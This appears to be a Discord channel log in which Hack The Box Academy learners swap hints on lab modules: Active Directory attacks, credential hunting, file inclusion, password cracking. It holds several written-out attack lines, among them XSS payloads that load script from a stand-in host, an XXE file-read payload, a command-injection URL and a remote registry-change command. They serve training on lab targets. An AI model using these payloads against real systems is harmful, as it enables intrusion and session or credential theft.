#modules

1 messages · Page 61 of 1

analog tendon
#

hmmm well i can try that. am i supposed to mount it on the target machine or do you think i can use my machine with a vbox to open it?

fresh reef
#

I need assistance , ive tried so many ways

thorn urchin
analog tendon
#

ill give that a shot and come back if i cant figure it out

proud pine
fresh reef
#

I tried via evil-winrm but the via the pth attack via the Administrator account doesnt produce the relevant kerberos ticket due to the why i auth

#

and no luck on cracking the hash

fresh reef
#

even when tunneling via proxychains and chisel lo luck with GetUserSpns or secretsdump

#

and back on the web shell my original LOL method to collect the SPN's and tickets via setspn thrown the error of the missing assembly

#

It's...wild

#

@.@

#

Even after porting mimikatz over i can privilege::debug but sekurlsa::tickets /export throws an error

#

that nither module in found

#

oh and PowerView/SharpView.... just refuse to work most likley due to that missing assembly situation

#

Unless Im just bad lol

analog tendon
thorn urchin
#

idk what lfg means here but 👍

analog tendon
#

lets fucking go

thorn urchin
#

lol got it

proud pine
red current
#

I'm in the credential hunting in Windows and I can't seem to get anywhere. I tried using lazagne.exe and it didn't find anything and findstr isn't finding anything useful either. Any hints with this one would be really helpful.

#

Also, lazagne keeps closing on me so I have very limited time to search through it before it closes.

analog tendon
red current
#

I'm running it through the terminal.

analog tendon
#

try putting a -v at the end

red current
#

I even tried with -vv and it still just completes and closes.

#

I'm going to try restarting the instance.

#

I even started a new instance and I'm running into the same problem. lazagne opens and runs and then closes after completing.

#

I was able to stop it by clicking in the window and found a password for gitlab but it says it's the wrong one. I'm really not sure what I'm doing wrong here.

#

Okay, I found a file with the first two answers. I still can't get lazagne to work properly. Any ideas why it just closes? Reinstalling it doesn't help either.

snow laurel
#

paste this in google or any of your browser: file:///C:/Users/ZaD_MINI07/Downloads/Untitled%20document%20(1).pdf

#

very nice

#

Created today xDDD

snow laurel
#

It doesn't work for u?

#

damn it

#

aight i'll try to share it a diff way

#

awww cmon who deleted it?

red current
#

I tried using lazagne on the pwnbox as well and I have the same issue there I've always had. The rdp into the Windows box crashes and I then can't get xfreerdp to restart.

thorn urchin
dapper temple
#

I've been looking for previous posts of them for the Skill Assessment for Command injection, and couldn't find any. any guidance you can give on this? I
So I resolved it, but got it in an unexpected way. I did not use the filters ||&,|,;|| which I would've never guessed without trying countless scenarios by accident. This was not so obvious. Did anyone else out there use those filters to solve this one?

hazy grotto
#

You can dm me.

red current
#

Okay, now the rdp session into the Windows machine even through my VM crashes and won't let me restart it. Is anyone else having issues with rdping into the provided vulnerable box?

rustic sage
#

@red current accept me as friend I’ll help

red current
#

Thank you, userxfi. I just have the last question left to go.

rustic sage
#

K check dm

#

Send me a message

#

@red current ^^^

dapper temple
#

is getting message Malicious request denied! close to solving Command Injection?

thorn urchin
#

it can be

#

its telling you something in your payload is being blocked

#

if you can narrow it down and then remove it, you can try other things

thorn urchin
#

Ive not noticed this, but Im pretty sure some of the writers are indeed english 2nd language.

surreal hazel
#

I have to give them credit because they’re somewhat better at communicating than the more-skilled members of my university’s cybersecurity club, despite being native English speakers, lol

wheat garden
rigid cedar
#

If anyone has done the active directory bloodhound module I could use some help! I am on the very last question in the skills assessment

#

actually got it

fading coyote
#

hello

#

was wondering if i could get some help with XSS module

#

i am doing the session hijacking part

#

and i can't figure out why none of the payloads are sending any request to the server

#
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://OUR_IP")</script>```
#

i used the following payloads and no luck

#

no sure what i am doing wrong

#

oh

#

nvm

novel matrix
#

Please keep this channel on topic.

thick dove
#

sorry

fading coyote
#

or is there another one

cosmic dagger
#

wher you are going to inject this in? url box?

novel matrix
fading coyote
fading coyote
#

so input box

#

turned out i was trying all the suggested ones in the module

#

and the correct one wasn't the mentioned one

cosmic dagger
#

are you sure input box doesn't use sanitize function?

fading coyote
#

not for that module i assume

#

or at least not for that input

#

there was multiple one's to try the payloads on

cosmic dagger
#

use tampermonkey

fading coyote
#

the correct wasn't mentioned in the steps in the modules so i just skipped it

#

but it was the vulnerable one

fading coyote
cosmic dagger
#

is there any jquery module? because you used $.getScript function.

fading coyote
#

maybe later down the road

#

i found the correct one in the module

fathom pendant
fathom pendant
#

like you said you were able to find the right payload with a little digging, so I'm sure other people are just as capable :D

#

unless they are not good with Google Fu

fading coyote
#

lol

#

google

#

what would we do

#

without it

#

am i right?

fathom pendant
#

In which case Hacking in general is not for you if you don't know how to google

#

and coding in general

fading coyote
#

commputer in general

#

just stick to sticks and stones

fathom pendant
#

those can break bones yaknow

#

but GL and HH :)

fading coyote
#

learned that the hard way

#

tyty <3

cosmic dagger
#

by the way, you can do real hacking with greasemonkey or tampermonkey. by bypassing csp (Content Security Policy)

fathom pendant
#

while that is true; HTB is focused on the whitehat side of things with redteaming more in mind; where you are doing sanctioned hacking

hollow dagger
#

isn't it!? I guess we would never reuse an id_rsa...but these silly sys admins we're up against might 😉

fathom pendant
#

you'd be surprised in an enterprise environment

#

:)

deft escarp
#

I gotta use Google more and chatgpt less

hollow dagger
fathom pendant
#

chatgpt can often be confidently incorrect

hollow dagger
deft escarp
#

It can easily become a crutch tho so I gotta be careful

fathom pendant
#

Also; taking breaks is OK to do

hollow dagger
fathom pendant
#

if you're getting frustrated on something that seems simple - take a break and come back

fathom pendant
#

Can't tell you how many times i've stepped away, come back and saw the answer was right in front of me

#

sometimes literally, plaintext

gloomy sigil
#

Attacking Authentication Mechanisms module question:
In the section "Weak Public/Private Keys" I'm not able to import the certificates into SAML Raide Certificates. It just shows the error message: "Error reading file. (signed overrun, bytes = 466)".
Did anyone faced the same issue?

warm flint
#

i think there's a not fully written question in module FILE INCLUSION page PHP Wrappers

iron plaza
warm flint
#

oh thanks in previous sections it said some specific directory with words so thats why i got confused

iron plaza
warm flint
#

ok thanks

brisk geode
#
# Module: **Attacking Common Applications**
## Section: **WordPress - Discovery & Enumeration**
### Question: *Enumerate the host and find a flag.txt flag in an accessible directory.*

I have solved other 2 questions but have no clue how to get this one any nudges would be helpful, also i tried to read the src code but found nothing effective, Thanks in advance```
autumn pilot
#

navigate the website and check the source

warm flint
#

Can someone help me with a slight hint in module FILE INCLUSION page PHP Wrapper. I can't figure it out the question is: Try to gain RCE using one of the PHP wrappers and read the flag at /

autumn pilot
#

find a way to issue commands on the target, for example a command that can list files/directories and then use a different command to get the output of the contents of a file

warm flint
#

ok thanks i will try

torpid violet
#

hello can someone help me in community help about attacking web applications with ffuf please ?

rustic sage
#

Hi all. I am really stuck in Miscellaneous Techniques on Linux Privesc Module... Im finding it a non sense from the explanation to the question... Could anyone help me? Thanks

clear finch
#

can I know the HTB academy price per year ?
including teir3 ||| and all modules @red obsidian

warm flint
#

@autumn pilot Hey sorry for disturbing you but I still can't figure it out, I can display /etc/passwd and id but i cant understand what am I suposed to do and what to use to do it.

autumn pilot
#

The file is somewhere in /

wintry crown
#

hei guys

#

can someone help me?

pliant flame
#

Hi guys. I just finished Pivoting, Tunneling, and Port Forwarding Skills Assessment.

After getting the credentials for v**** how was I to know that the last host was on 172.16.6.** instead of 172.16.5.***?

wintry crown
#

is there any way of actually gaining cubes other than buying them?

proud pine
proud pine
pliant flame
covert blade
#

Hi all, I'm a beginner,
can I start directly with the penetration tester path ? or should I look into something else before?

I've read the "learn-to-hack-beginners-bible" and I found there that beginner should learn:

  1. Networking
  2. Linux
  3. Windows
  4. Bash scripting
  5. A scripting language (like Python)

The only think I do not have in this list is Networking knowledge. In the rest (2 to 5) I'm an expert

pure sage
#

Guys after getting student subscription will i be able to fulfill cubes for job role path ?

rustic sage
rustic sage
autumn pilot
#

you don't get cubes with the student subscription

rustic sage
#

^ forget to mention that. You will be able to do the courses, but don't get any cubes from the subscription. Completing the modules still gives cubes

covert blade
autumn pilot
#

the one that has the name "intro to networking"

rustic sage
#

I'd do Intro to Networking and maybe Intro to Network Traffic Analysis as well

silk glade
#

Guys hello,i am in FOOTPRINTING EASY lab. I saw user:pass provided but want to do that without it. Did Hydra with ftp_betterdefaultpassword.txt and top usernames ,but no luck. Can someone help me?(Nevermind,i found,rockyou and 10k-most common wordlists helped)

warm flint
#

@autumn pilot man i start feeling stupid but i still can't get it i've been trying and i just cant understand i do ../ so that i can go to suposedly / then i try flag or flag.txt and nothing. It's probably something simple but my mind cant think of it

raw sierra
#

Can I be a mod? Pleasseeee🥺 😢

autumn pilot
#

list the files in the / directory

warm flint
autumn pilot
#

are you using the examples in the section

warm flint
#

yes

autumn pilot
#

this is enough for you to execute commands, and eventually list files

warm flint
#

yes i tried to read flag.txt or /etc/passwd for example but nothing happens i just dont understand how the whole command works

autumn pilot
#

the thing is that the file is not called flag.txt

#

and the RCE is basic linux commands

covert blade
rustic sage
#

I've never done CCNA so I can't answer that

covert blade
rustic sage
#

haven't taken them.

covert blade
#

alright, so they are not necessary to be good at hacking right?

rustic sage
#

you don't really need any cert to be "good at hacking"

#

imo certs are really just a way to show off what you know and bypass some basic interview questions/tests

#

not saying certs are bad, but you can still be good at something without them.

covert blade
#

nice thanks

warm flint
autumn pilot
#

take a break, and after the break go through the things again

#

a hint - the command from the section's examples is working

desert stump
#

Hi All.
I am doing the CrackMapExec Module on HTB Academy and have noticed some typo's in some of the texts. Where is the best place to feedback this?

autumn pilot
rustic sage
autumn pilot
#

nudge -> you can access the share through the target without the need to mount it on your machine

modest isle
#

Got a problem with Linux Fundamentals module

modest isle
#

What is the type of the service of the "syslog.service"?

#

This module just got updated tho

grand harbor
#

can someone help me with the footprinting module footprinting lab -medium: Enumerate the server carefully and find the username "HTB" and its password. Then, submit this user's password as the answer.

I have got the admin account and im in the datbase but i have no clue how to get the password

primal silo
#

hi

#

can someone help me with this question

#

im stuck as it has rate limit

#

and there is no anti csrf token

elfin nacelle
#

Can someone help me with the File Upload Attacks module, Limited File Uploads section. I sent the xxe payload in burp and uploaded it to the target and can see a list of directories in the source code but cant interact with them. Can someone give me a hint please?

primal silo
#

Module broken authentication section brute forcing passwords

primal silo
elfin nacelle
elfin nacelle
#

I'm just not sure how to modify this section of it: "file:///etc/passwd"> ]

primal silo
#

/etc/passwd is a file in linux

#

i have to delete my text as it contains the answer part.. i hope it helped u

elfin nacelle
#

Thank you! I was trying to provide a full path instead of just the file name.

primal silo
#

welcome :))

#

i hope somebody helps me too

raw sierra
#

HI

primal silo
#

i need help with broken authentication module can sm1 help me

modest isle
#

How can figure out the type of service syslog.service is??

elfin nacelle
# primal silo welcome :))

The second question im stuck on as well. I view the source code with the following script:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>

It gives me a long base64 string.

Then I used burp decoder to decode it:

<?php
libxml_disable_entity_loader(false);

$svg_file = file_get_contents('./images/' . file_get_contents('./images/latest.xml'));
$doc = new DOMDocument();
$doc->loadXML($svg_file, LIBXML_NOENT | LIBXML_DTDLOAD);
$svg = $doc->getElementsByTagName('svg');Cj8

Am I doing this incorrectly? I still dont see an uploads directory?

primal silo
#

you have the answer already

#

you have to use the directory name as answer

timid osprey
#

Anyone done the Live Engagement lab from Shells and Payloads module?

#

It could be the worst lab I have done in HTB due to the foothold machine is bad.

#

It should really be reworked

rich light
#

If you need help, DM me

atomic ruin
#

Not sure if I'm the only one but the Password attack module just drains all energy out of me

rich light
cunning marsh
warm flint
#

@autumn pilot I did it man i found it thanks for the help and for not giving me the answer but making me think

cunning marsh
#

anyone know the wordlist for Password Module - Easy? is it the ||mutated|| one? with username.list?

timid osprey
vital seal
#

For those of you who have done it, what do you guyz think of OSINT: Corporate Recon module? IDK if I should spend 1000 cubes on it lmaoo

sly tapir
#

Password Attacks/Pass the Ticket from Windows: cannot RDP via xfreerdp or evil-winrm, I thought I might have to go in an disablerestrictedadmin, but i cannot get in evil-winrm...am i missing something here?

opaque niche
#

restart the machine or check that the credentials are correctly written

sly tapir
warped cape
#

HI, I am stuck in the last question of "Bloodhound - Skills Assessment", Q: Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78). Can someone help me please ?

acoustic owl
thick venture
#

hi could someone help me with the task 11 on the box called Appointment on starting point tier 1?
i did a SQL injection and got in the website, then got the root password but when i answered this question it always shows the answer as wrong so i cant enter the root flag at task 12
i'll send some screenshots of my tries (the first one with admin'# worked on the website so idk why it doesnt accept it here)

#

also my bad if this is the wrong place to ask for help on these starting point stuff, im not 100% sure where to ask ngl

tribal plume
thick venture
#

oh i think i might've missunderstood the question, thanks lol i'll try that

tribal plume
thick venture
#

yep thanks alot for the help man i'll use there if i need any help i apreciate the help alot

deft escarp
#

Took me two weeks but I finally finished the footprinting module

#

🫠

cunning prairie
#

@hv7 You still stuck on imap/pop3?

wheat garden
#

any one do AD Enumeration & Attacks - Skills Assessment Part II can help me with question 6 " Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file? "

sudden oracle
#

Hi, I need help with the subscription to HTB on the portal. Clicking on the HTB Support leads to just discord opening and I am not sure where to ask for help. Could someone point me in the right direction?

vital adder
vital adder
turbid lily
#

In Attacking Common Applications, Splunk module, the server is not responding even when I have restarted it several times (and yes, I have tried to access to it on ports 8000 or 8090, where Splunk is usually running, and is running [used Nmap on it]) 🤔

vital adder
#

you mean Attacking Common Applications?

turbid lily
#

oh, yes, erratum there

vital adder
#

if you are in the Splunk - Discovery & Enumeration section the website should be on port 8000 if you can't see it maybe give the target a few min to fully booted up

turbid lily
#

Yes, I mean, the sections are simple. But I guess I'll just wait

vital adder
#

also you access it with https right?

turbid lily
sick warren
#

AD Enumeration & Attacks - Skills Assessment Part I .. I can't get the password of the user on MS01 .. I tried lazagne and tried finding it manually using findstr .. No luck .. any hints?

sick warren
#

i already figured it out because of seeing dates and i knew who the use is

#

rn im actually gonna dump ths S** for hashes and see if I can make it

autumn pilot
#

May I ask why the jump boxes (particularly linux ones) are mostly with resolution that was quite popular in 2003-2004?

#

if you think that with this resolution is easy to read stuff, then I should consider buying an old CRT monitor

livid bluff
#

HI
I'm stuck in Password Attacks Lab - Medium
I'm logged in with user Dennis but can't find how to privesc to root.
Apparently the solution is in Dennis' home directory, I tried to reuse the ssh key but I don't know the passphrase. I did try to crack it but no wordlist gives me the password.

autumn pilot
#

there is no need to crack it, just simply try to find a way to see what this user might have done and repeat it

livid bluff
autumn pilot
#

you don't need it

livid bluff
#

I don't see what I can do

autumn pilot
#

the most basic thing

#

you can SSH

livid bluff
#

I must not be wide awake but if I try to connect with the key it asks me for a passphrase that I do not know

autumn pilot
#

you don't need to copy the key

livid bluff
#

well if I take the history and I redo my own key it is just valid for dennis but not for root. I don't see how to login in ssh with root

autumn pilot
#

all I can say is that you are more than half-way there

livid bluff
#

it was necessary to crack the passphrase of the key. it's just that I already had another key on my desktop from another module and I was not trying the right key ...

sick warren
sick warren
#

Already did and it, that's how I got the NT hash

#

when i tried cracking it i didn't get the credentials

acoustic owl
#

The password is displayed in plain text. You can not crack it

sick warren
#

I sent u a screenshot prv to see what i meant

lucid veldt
#

How do I server files from Windows without downloading a tool like impacket?

grand harbor
#

just finished the footprinting module, gotta say that was a hard one.

autumn pilot
#

what kind of an access do you have on the target (windows machine?)

rustic sage
#

I finished the Introduction to Academy yesterday and I definitely can say that I will be using this program daily from now on. htb ❤️

north ermine
#

Hi ! I am working on Attacking Enterprise Networks - Web Enumeration & Exploitation

I can't manage to access the gitlab subdomain, it always redirects me to port 8081

#

Does someone had the same issue ? I tried to restart the instance several times

#

On nmap nothing shows up on port 8081

#

And port 8080 is the support host

#

Buit when i use curl I can see a redirection to the user directory, which whem directly requested works

true cloak
#

is this

#

the general chat

#

where is general chat

rustic sage
#

I am stuck on broken authentication predictable reser token question 1
I tried editing reset_token_time.py to generate the token. It keeps failing.
I manually tried creating the token with time difference +-1 but it also keeps failing

storm jackal
#

<@&861185840277487616>

rustic sage
#

spik gud england laik me'

little whaleBOT
#

alwer (929775749785849876) has been banned until 2023-06-04 13:52:31 (UTC).

winged hedge
uncut ocean
#

Anyone here who can help me in Precious machine??

leaden smelt
#

Hello guys , i have an question related to XSS reflected

#

What the attacker can do if he found xss vulnerability

#

As an attacker way not as a pentester

brave palm
#

who did the passwords attacks module recently? i need to ask a question of a section i just completed but i didnt understand how it fully worked lol

#

(in the PassTheHash section)

opaque niche
brave palm
autumn pilot
#

You are basically executing commands using the credentials you had over the DC which is another machine

#

To sum it up a bit more clearly, you act on behalf of X user on Y machine, and do a Z action

brave palm
#

in fact i tried directly to get the txt content by just navigating to julio's folders but didnt find the folder containing that txt, when i did the rev shell it was there instead

autumn pilot
#

Try comparing the hostnames and ip addresses

brave palm
#

so the julio hash that i have are on the MS01 and the rev shell made me connect to the julio on DC01?

autumn pilot
#

yes

brave palm
#

oh perfect

#

thank you! haha i was getting a bit confused

desert stump
#

Can anyone assist with the CrackMapExec Module

#

I am trying to run the command
crackmapexec smb 10.129.121.154 -u robert -p Inlanefreight01! --computers
to get the answer to Q2
But i am getting the error
Error enumerating domain computers using dc ip 10.129.121.154: unsupported hash type MD4

slender kelp
#

I'm kind of stuck in the active subdomain enumeration section of information gathering - web edition. the first question was easy, the second q I'm not 100% sure if my reasoning was correct but the answer was accepted. q3 I was kinda just throwing things at the wall to see if something would stick, if you know what I mean. 🙂 been stuck at q4 for hours now

wintry lark
#

Hi. Can anyone help me with "Getting Started Privilge Escalation" ? I have made it to user2 and find id_rsa. But i have no clue how to copy the file id_rsa to my machine without the password from user2. I tried scp, python http server and I copied the content of the id_rsa and created a file on my computer with the same name and content. If i try to connect ... ||└─$ ssh user2@165.227.228.154 -p 30076 -i id_rsa
Load key "id_rsa": Permission denied||

livid bluff
#

HI,
On Password Attacks Lab - Hard
I can't find a wordlist that works to connect in rdp. I'm using crackmapexec apparently it should use the mutated list but it doesn't give me anything.
I tried I'm not sure of the user if it's johanna or Johanna but with both it doesn't work, I tried several lists and rockyou has been running for a while

opaque niche
livid bluff
cunning marsh
#

winrm --local-auth

#

and its||mu||

opaque niche
opaque niche
livid bluff
#

it doesn't return anything to me either

cunning marsh
#

nah bro its

#

in the || mutated. || must be something wrong with your list

#

This hard lab is a tough one. You'll be cracking more passwords later so make sure to fix your file

livid bluff
cunning marsh
#

try that and recheck the name for Johanna

opaque niche
#

Also, you shouldn't take too long johanna's password

livid bluff
#

It's the same i have 94044 word.

#

I have restart the box and this time is good ...
Thanks @cunning marsh and @opaque niche 😉

autumn pilot
#

bruteforcing smb, winrm; bloodhound data, rpcclient enum; kerbrute and etc

manic perch
#

I'm stuck on initial foothold in the medium lab of password attacks. I tried the provided usernames & passwords but no hits so far. Any hints?

opaque niche
manic perch
#

The provided ones from the course username.list and password.list

opaque niche
manic perch
#

Should these creds work on smb? As i'm currently using SSH because I'm getting false positive results with crackmapexec on smb

opaque niche
#

I did not use crackmapexec because I tried with|| hydra|| first and it worked

manic perch
#

Did you compile hydra with smb2 support? As I'm getting an smb error, that's the reason i'm using cme

cold lake
#

Hey friend !!!
i'm stuck here
Password Attack Lab -Medium
Examine the second target and submit the contents of flag.txt in /root/ as the answer.

i'm in jason user , don't know further , for denish and root access

tidal lark
#

hello, can i send a photo throught this chat? I can´t understand one thing and I'd wish someone could help me

vital adder
vital adder
tidal lark
#

i think i can't verify since i'm still in htb academy

#

im new tho

#

can i send a link for the community help channel where i posted my question?

feral moth
#

Hello everyone, i'm new in this scope and i was trying to have some starting course, i've had a look at tryhackme but then i found hackthebox, do you know if there are some free courses to get started and test something with my hands in hackthebox? and if yes could you please redirect me where are those courses?

tidal lark
opaque niche
feral moth
#

appreciate!

opaque niche
#

^^

vital adder
# feral moth Hello everyone, i'm new in this scope and i was trying to have some starting cou...

Introductory video on getting into hacking and cybersecurity.

▶ Play video

Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2023-edition/
Academy: https://academy.tcm-sec.com

Timestamps:
0:00 - Introduction
0:41 - Intigriti Sponsorship
2:01 - Important Notes
4:12 - Building a Foundation
5:14 - Basic IT Skills
8:22 - Networking Skills
12:35 - Linux Skills
15:07 ...

▶ Play video
vital adder
tidal lark
#

aah okay

#

thanks for the info

echo roost
#

wow that last footprint lab is pretty tough ngl. Had to use and|| IMAP ||syntax hint. Took forever to find ||SNMP.||

echo roost
valid nest
#

ooops!! tunneling and chiseling!! I think....

warped cape
steady hawk
#

Hello, can someone lend me a hand with Attacking Common Applications – Skills Assessment 1 please? I was able to get RCE via ||http://10.129.201.89:8080/cgi/cmd.bat?&dir|| but no commands other than ‘dir’ work. I’m not sure what to do now, I’ve tried multiple commands with no results.

autumn pilot
#

try to look for the CVE and then look at the examples

mellow turtle
#

and if it dont work url encode the payload and try again

steady hawk
mellow turtle
#

@steady hawk i think i lied to you, my notes are awful 😂

#

sorry

tidal lark
#

its a redirection to a question in the community-help channel

grand hatch
#

On the "Abusing HTTP Misconfigurations" module I have completed everything but, "Bypassing Flawed Validation". Any tips on this one? Seems like it might be one of the easier ones but I'm stuck on it.

idle hull
#

If you are still stuck, try configuring a mail client on your attack box with the creds you know.

rustic sage
#

anyone available for a dm on the last question in AD Attacks and Enum, Living off the Land? has to do with dsquery and ldap but don't want to spoil

opal jewel
#

How long does it take to crack Notes.zip in Protected Archives? I am half tempted to take this to my main OS and use a GPU.

#

Its obvious rockyou is not the way and previously mutated passwords from given file ETA 2 days ? I mean, is there a reason to make it this difficult time consuming to show case a methodology?!

rustic sage
opal jewel
analog tendon
#

sorry custom.rule

opal jewel
#

Already tried that one, box expired before it finished

#

So I decided to create (smaller lists) from it

analog tendon
#

what are you using to crack it?

opal jewel
#

Tried john and hashcat

#

Im about to just take it to my host and use my gpu

analog tendon
#

dont do hashcat. and did you put it into a hashable format before attempting to crack?

opal jewel
#

Yes of course

analog tendon
#

whats they hash per second speed when trying to crack it?

#

my vm isnt using a gpu and it was able to find it fairly quickly

opal jewel
#

I honestly need to look again. I really just wanted to make sure im not crazy 🤷‍♂️

#

Ill just use my host. No big deal

analog tendon
#

nah. if anything since i attempted to modify my passlist too it did create issues. i would try rebuilding it using the command given in the cheatsheet. should be ~94k passwords

opal jewel
#

Gotcha. Shall give a shot. Thank you!

analog tendon
#

np

rustic sage
#

I'm definitely doing something wrong none of these disabled users have descriptions🤔

orchid pine
#

Hello guys

#

I wanna know how to know the listning port

#

Cuz i was working on nibbles htb

#

After submitting a source port on netcat

#

Im getting this error

#

ncat: invalid source port number "n". quitting.

opal jewel
jovial juniper
#

I am working on the Service Enumeration with Nmap. The questions is " Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer." I have used Nmap to find all the ports open, I have used Netcat to connect to each port open, I have also used the --packet-trace option like in the module, and used the banner script in Nmap but I am not finding any flag in any of the banners. I have used both the PWNBox as well as my own Kali box connected to the VPN. I have also respawned the box many times, and disconnected/reconnected to the VPN multiple times. I am not finding the flag is there anything else I should be trying I'm not sure what I am missing?

rustic sage
opal jewel
#

Are you dumping from ldapsearch or natively?

rustic sage
#

using dsquery. That’s what was taught in the module so I’m trying to complete it that way

#

I’m definitely going to be doing the LDAP module after this

opal jewel
#

No clue what that is 😁 and not far enough into modules

#

Or at least never used it

rustic sage
#

it’s for AD Enum & Attacks, Living off the Land

opal jewel
#

Ahh

livid zephyr
#

module: footprinting ; section = footprinting Lab - easy. I am having issue accessing the ftp to browse thru it and download files. I had done the following unsusscesful: how did you solve this one? any ideas on what I am doing wrong?

analog tendon
#

id have to do this one again to figure it out but i dont think getting into ftp was the way to do it.

#

it says you have to enumerate the target to get the answer. there is a TXT file hidden in the DNS server

livid zephyr
analog tendon
#

no problem. it happens to us all

clear saffron
livid zephyr
hollow bramble
#

In the Skills Assessment of the Pivoting, Tunneling, and Port Forwarding module, does it make sense that the|| lsass.DMP file seems un-base64-encodable||?

hardy hare
#

My brain hurts now. The skill assessment took 4 days of working a little at a time and getting crazy frustrated over and over, but I finally finished the Broken Authentication module.

tight mesa
#

I'm stuck on the sql injections module. I don't really understand this question: We see in the above PHP code that '$conn' is not defined, so it must be imported using the PHP include command. Check the imported page to obtain the database password.

#

I followed all the steps in the module, but nothing came back. It didn't talk anything about php. Can someone help me understand?

dapper temple
#

Is it normal to get a public ip address for the question machine at the end of an exercise?

kind turret
#

@dapper temple Yes it is. Sometimes dockers get used so you will get a public IP address for it.

dapper temple
kind turret
#

@dapper temple Dockers don't have access to the Internet

dapper temple
#

But I can browse to the victim machine which the module asks me to spin up. and it has a public address. My VPN is not even on I can reach it.

thorn urchin
#

those challenges rarely if ever need a reverse shell to complete

cold lake
#

Password Attacks Lab - Medium
i'm in dennis but , how to go to root

opal jewel
cold lake
#

i have .ssh , so i need to connect via id_rsa or what?

violet prism
#

hlo im new

#

can someone tell me how to remove malware

opal jewel
plain coral
#

Does anyone know the fix for using xfreerdp on the Pwnbox? 4:47:32:975] [4734:4734] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.? inb4 someone says just use remmina.

opal jewel
cold lake
opal jewel
#

@cold lake The hard module is actually way better. Has a rhythm to it✌️

cold lake
#

tell me for root in medium lab

opal jewel
#

Literally the biggest hint re-use

cold lake
#

okay, i think i got it

cold jacinth
#

bruh i am new and i dont know how to start

low vine
red obsidianBOT
thorn urchin
low vine
#

Web Services & API Attacks - SOAPAction Spoofing -
Even googling I'm not seeing how I would go about figuring out the architecture of the webserver. Its a 1 or the other question so I've got it but I dont actually understand how I would find that.

plain coral
#

Did you end up getting a fix for this apart from using Remmina?

fathom pendant
#

it just ended up working a different day

#

¯_(ツ)_/¯

#

also that was 2 months ago; if I did a fix i have since forgotten about it

plain coral
fathom pendant
#

Remmina is much more user friendly; all I can say is update your system and everything

#

but aside from that I have since lost any info on any TS i did

rustic sage
fathom pendant
#

that has nothing to do with anything skiddie bot

rustic sage
fathom pendant
#

please read the #rules and #welcome ; and keep this chat on-topic for the academy modules :)

low vine
#

this idiot been messaging everyone

#

wonder how he's not banned

fathom pendant
#

Guess it's time to bring in the nukes? <@&861185840277487616>

languid dawn
#

hi

fathom pendant
#

Hi Grey :) @rustic sage has been asking people about what digital wallet they use and apparently messaging people too

languid dawn
#

Dm me the details if you have them

fathom pendant
#

just scroll up a bit :3 and I guess Axiom may have been dmed about it

#

I just straight ignore random dms

languid dawn
languid dawn
low vine
sonic ferry
#

Need help on Skills Assessment - File Inclusion. I pretty much know I'm doing right things at the moment. But now the access.log stopped logging anything I do so I can't progress. When I tried poisoning at first with just random string it went through and showed up on the log, but after progressing from there, the log stopped logging anything I do, making the task impossible.

The targets also sometimes randomly crash or freeze on Hackthebox. This seems to happen way too often for a website this big. I have to restart the targets several times for me to once again connect to them.

manic perch
low vine
#

Unsure if just having a brain fart, but would like a small nudge.
Webservices & API - Information Disclosure (SQLi)

I've tried using sqlmap + manually sqlinjection. Am I just failing in my manual testing?

#

wait.....i think I've been attacking the wrong thing ><

#

and forgot to put /?

hidden trellis
#

can someone please help with Brute Forcing Cookies qusetion 2 in Broken Authentication

sonic ferry
turbid tartan
#

attacking common service i spawned the machine like 6 times now but everytim the|| 2121 ||port is closed

vital adder
vital adder
vital adder
cold lake
#

Password Attacks Lab -Hard
what to do for find Administrator Account pass after you find Johnna password

autumn pilot
#

there is a certain thing (file) that sticks out

#

find it and think of a way how to break into the file

low vine
#

WEB SERVICE & API ATTACKS - INFORMATION DISCLOSURE (VIA SQLI)

Okay so I've been stuck on this particular one for a couple hours. I've walked through all the databases and I must just be missing the table i'm supposed to be looking into to grab the information on the answer.
Have not been able to find a username with the position of "736373"

I cannot seem to find the place where I can identify user positions just need a bit of help / hint

manic perch
turbid tartan
#

attack common services smb i dont get a hit on the given worlist?

#

for the user jason

autumn pilot
#

the provided password list plus --local-auth if you are using cme

turbid tartan
#

oh yes now i got it thanks

desert stump
#

Is it possible to get any support for the CME HTB Academy module ?

autumn pilot
#

depends if you ask a specific question, someone might jump in and assist as long as that someone has done the module or has comprehensive knowledge of cme

desert stump
#

it feels like its a bug with the lab.
Trying to run a command from the instructions.
Tested from my machine via the VPN - Timeout
Tested from PwnBox also timeout

#
[★]$ sudo cme smb 10.129.97.108 -u Administrator -p 'AnotherC0mpl3xP4$$' --local-auth -x "reg add 
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"
SMB         10.129.97.108   445    MS01             [*] Windows 10.0 Build 17763 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB         10.129.97.108   445    MS01             [+] MS01\Administrator:AnotherC0mpl3xP4$$ (Pwn3d!)
ERROR:impacket:Could not connect: timed out
#

if i test by pinging the lab, its intermittently accessible

#

Ive tried restarting the target multiple times

autumn pilot
desert stump
#

Did you do something differently ?

autumn pilot
#

nope, just copy and pasted the command

#

make sure you don't have an extra new line after reg add

low vine
#

Hey dpgg could I possibly get a small hint. I have UNION injection for Web Services & API Attacks - Inforamtion Disclosure (SQLi).
I have manually looked through everything and I'm not able to find where the positions are stored.

autumn pilot
#

haven't done that module, sorry

desert stump
#

Yeah i don't know the command simply does not work for me

#

same thing every time

#

and the target intermittently drops off the network

#

ive tested other commands and they work

autumn pilot
#

so, reset the target, then stop any VPN connection that you have both pwnbox and locally

#

give it 2-3 minutes and try again

desert stump
#

this is from PwnBox currently

autumn pilot
#

and theoretically speaking your command is on one single line, right?

desert stump
#

i actually just this second copied it into VSCode and saw its 2 lines

#

will test again

autumn pilot
#

edit it to be on one single line

desert stump
#

worked

#

thanks @autumn pilot

turbid tartan
#

